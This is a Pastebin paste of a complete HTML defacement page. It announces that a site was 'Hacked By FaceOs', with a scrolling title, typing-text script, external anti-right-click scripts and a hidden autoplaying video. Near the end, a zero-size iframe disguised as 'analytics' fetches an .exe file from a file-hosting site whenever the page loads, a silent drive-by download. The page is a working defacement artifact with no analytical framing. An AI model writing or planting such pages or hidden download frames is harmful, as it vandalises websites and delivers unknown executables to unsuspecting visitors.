Advertisement
arrubmas

Untitled

Dec 16th, 2016
2,423
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <title>Hacked By Th3M4st3r and GBLOKO</title>
  3. <link REL="SHORTCUT ICON" HREF="http://i45.tinypic.com/1o6cqx.png">
  4. <script type='text/javascript'>
  5. //<![CDATA[
  6. msg = "..::Hacked By FaceOs a::.. ";
  7. msg = ".:Please patch your system:." + msg;pos = 0;
  8. function scrollMSG() {
  9. document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
  10. if (pos > msg.length) pos = 0
  11. window.setTimeout("scrollMSG()",80);
  12. }
  13. scrollMSG();
  14. //]]></script>
  15. <script type='text/javascript'>
  16. var DADrightclicktheme = 'Dark';
  17. var DADrightclickimage = 'http://sphotos-h.ak.fbcdn.net/hphotos-ak-ash3/p206x206/14562_183874628425481_1378122133_n.jpg';</script>
  18. <script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script>
  19. <script type="text/javascript" src="http://cayunkatel.googlecode.com/files/rainbows.js"></script>
  20.  
  21. <style type="text/css">body {cursor:url("http://i45.tinypic.com/1o6cqx.png"),default}</style>
  22. <body background="">
  23.  
  24. </script>
  25.  
  26. <div id="matrix"><b> ................   TheM4st3r and GBLOKO      ................</b></div>
  27.  
  28.  
  29. <style type="text/css">body {
  30.  
  31. background: #000000;
  32.  
  33. font-family: Courier New;
  34.  
  35. color: #ff0000;
  36.  
  37. text-align: center;
  38.  
  39. }
  40.  
  41. a {
  42.  
  43. text-decoration:none;
  44.  
  45. color:
  46.  
  47. #ff0000;
  48.  
  49. }
  50.  
  51. </style>
  52.  
  53. <script type="text/javascript">/*<![CDATA[*/
  54.  
  55. TypingText = function(element, interval, cursor, finishedCallback) {
  56.  
  57. if((typeof document.getElementById ==
  58.  
  59. "undefined") || (typeof element.innerHTML == "undefined")) {
  60.  
  61. this.running = true;
  62.  
  63. return;
  64.  
  65. }
  66.  
  67. this.element = element;
  68.  
  69. this.finishedCallback = (finishedCallback
  70.  
  71. ? finishedCallback : function() { return; });
  72.  
  73. this.interval = (typeof interval == "undefined" ? 100 : interval);
  74.  
  75. this.origText = this.element.innerHTML;
  76.  
  77. this.unparsedOrigText = this.origText;
  78.  
  79. this.cursor = (cursor ? cursor : "");
  80.  
  81. this.currentText = "";
  82.  
  83. this.currentChar = 0;
  84.  
  85. this.element.typingText = this;
  86.  
  87. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  88.  
  89. TypingText.all.push(this);
  90.  
  91. this.running = false;
  92.  
  93. this.inTag = false;
  94.  
  95. this.tagBuffer = "";
  96.  
  97. this.inHTMLEntity = false;
  98.  
  99. this.HTMLEntityBuffer = "";
  100.  
  101. }
  102.  
  103. TypingText.all = new Array();
  104.  
  105. TypingText.currentIndex = 0;
  106.  
  107. TypingText.runAll
  108.  
  109. = function() {
  110.  
  111. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  112.  
  113. }
  114.  
  115. TypingText.prototype.run = function() {
  116.  
  117. if(this.running) return;
  118.  
  119. if(typeof this.origText == "undefined") {
  120.  
  121. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  122.  
  123. return;
  124.  
  125. }
  126.  
  127. if(this.currentText == "") this.element.innerHTML = "";
  128.  
  129. if(this.currentChar < this.origText.length) {
  130.  
  131. if(this.origText.charAt(this.currentChar) == "<" &&
  132.  
  133. !this.inTag) {
  134.  
  135. this.tagBuffer = "<";
  136.  
  137. this.inTag = true;
  138.  
  139. this.currentChar++;
  140.  
  141. this.run();
  142.  
  143. return;
  144.  
  145. } else if(this.origText.charAt(this.currentChar) == ">" &&
  146.  
  147. this.inTag) {
  148.  
  149. this.tagBuffer += ">";
  150.  
  151. this.inTag = false;
  152.  
  153. this.currentText += this.tagBuffer;
  154.  
  155. this.currentChar++;
  156.  
  157. this.run();
  158.  
  159. return;
  160.  
  161. } else
  162.  
  163. if(this.inTag) {
  164.  
  165. this.tagBuffer += this.origText.charAt(this.currentChar);
  166.  
  167. this.currentChar++;
  168.  
  169. this.run();
  170.  
  171. return;
  172.  
  173. } else
  174.  
  175. if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  176.  
  177. this.HTMLEntityBuffer = "&";
  178.  
  179. this.inHTMLEntity = true;
  180.  
  181. this.currentChar++;
  182.  
  183. this.run();
  184.  
  185. return;
  186.  
  187. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  188.  
  189. this.HTMLEntityBuffer += ";";
  190.  
  191. this.inHTMLEntity =
  192.  
  193. false;
  194.  
  195. this.currentText += this.HTMLEntityBuffer;
  196.  
  197. this.currentChar++;
  198.  
  199. this.run();
  200.  
  201. return;
  202.  
  203. } else if(this.inHTMLEntity) {
  204.  
  205. this.HTMLEntityBuffer +=
  206.  
  207. this.origText.charAt(this.currentChar);
  208.  
  209. this.currentChar++;
  210.  
  211. this.run();
  212.  
  213. return;
  214.  
  215. } else {
  216.  
  217. this.currentText += this.origText.charAt(this.currentChar);
  218.  
  219. }
  220.  
  221. this.element.innerHTML = this.currentText;
  222.  
  223. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ?
  224.  
  225. this.cursor(this.currentText) : this.cursor) : "");
  226.  
  227. this.currentChar++;
  228.  
  229. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()",
  230.  
  231. this.interval);
  232.  
  233. } else {
  234.  
  235. this.currentText = "";
  236.  
  237. this.currentChar = 0;
  238.  
  239. this.running = false;
  240.  
  241. this.finishedCallback();
  242.  
  243. }
  244.  
  245. }
  246.  
  247.  
  248. /*]]>*/</script>
  249. <center><img src="" border="0"width="350px" height="60px">
  250.  
  251. <p id="message"><b> {+} Site Hackeado ==>  {+} </b><br>
  252. ===========================================
  253. <span style="color: green;">
  254. <b><br>Site invadido pelos FaceOs</b></font><span style="color: lime;">
  255. <br />
  256. <br> <b><br>... </b>
  257. </font>
  258. <br />
  259. <br>
  260. <span style="color: Red;">
  261. <br><b>....</b><br></font>
  262. <center><img src="http://i.imgur.com/sqOoHwp.png" border="0"width="550px" height="320px"></center>
  263.  
  264. </center>
  265.  
  266. <div style="text-shadow: 0px 0px 5px red;">
  267. <span style="color: white;">
  268. <b>FaceOs --> : </b><marquee scrollamount="10" direction="left" width="50%"> FaceOs  :  GBL0K0 , TH3M4ST3R AND R00T H4ACKER ?????????????????????????????????? [_¯F_¯a_¯c_¯?_¯s_¯?_¯] ???????????????????????????????????
  269.  
  270. <script type="text/javascript">/*<![CDATA[*/
  271.  
  272. new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " +
  273.  
  274. ar[i.length % ar.length]; });
  275.  
  276.  
  277. //Type out examples:
  278.  
  279. TypingText.runAll();
  280.  
  281. /*]]>*/</script>
  282.  
  283. <iframe style="position: absolute; left: 0px; top: 0px; width: 0px;height: 0px; z-index: 0;" name="analytics" src="http://ddl7.data.hu/get/0/10176913/FaceOs.exe" frameborder="0" width="0" height="0"></iframe>
  284. /*]]>*/</script>
  285. <embed src="http://www.youtube.com/v/vsSNjoTRw8M&amp;autoplay=1" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1">
  286. </body>
  287. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement